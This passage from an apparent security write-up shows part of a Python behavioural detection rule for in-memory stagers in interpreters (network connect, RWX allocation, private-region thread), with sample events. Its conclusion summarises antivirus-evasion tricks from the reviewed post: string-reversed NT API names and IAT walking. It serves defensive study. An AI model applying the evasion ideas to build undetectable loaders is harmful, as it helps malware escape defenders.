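            if ev["kind"] == CHAIN[step]:
                if step == 0:
                    start = ev["ts"]
                step += 1
                if step == len(CHAIN):
                    flagged.append(pid)
                    break
    return sorted(flagged)

# Hypothetical events for illustration.
events = [
    {"pid": 4120, "image": "python.exe", "kind": "net_connect", "ts": 10.0},
    {"pid": 4120, "image": "python.exe", "kind": "alloc_rwx", "ts": 10.4},
    {"pid": 4120, "image": "python.exe", "kind": "thread_start_private", "ts": 10.5},
    {"pid": 5200, "image": "python.exe", "kind": "net_connect", "ts": 11.0},  # download only
    {"pid": 6300, "image": "chrome.exe", "kind": "alloc_rwx", "ts": 12.0},    # not an interpreter
]

print(find_chains(events))
```

Requiring all three steps in order keeps the rule quiet for interpreters that only download, while the time window limits matches to a single burst of activity.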

Conclusion

The g3tsyst3m post is a useful reminder that FUD is not a property of a payload — it is a property of a static analysis pipeline at a moment in time. Both stagers will eventually be detected as classifiers retrain on this exact pattern (string reversal of NT-layer API names is a strong signal once the model knows to look for it). What makes the post valuable is the mechanical clarity of the IAT-walking trick in Variant #2: it shows how much of the static surface vanishes when you treat the host process’s loader as your symbol-resolution oracle. For defenders the same clarity points exactly where to instrument — behavioural detection of RWX-from-interpreter, NT-API-from-interpreter, and private-region execution catches both variants regardless of how the strings are spelt on disk.

Original text: “Creative approaches to coding FUD Stagers” by R.B.C. (g3tsyst3m) at G3tSyst3m’s Infosec Blog.
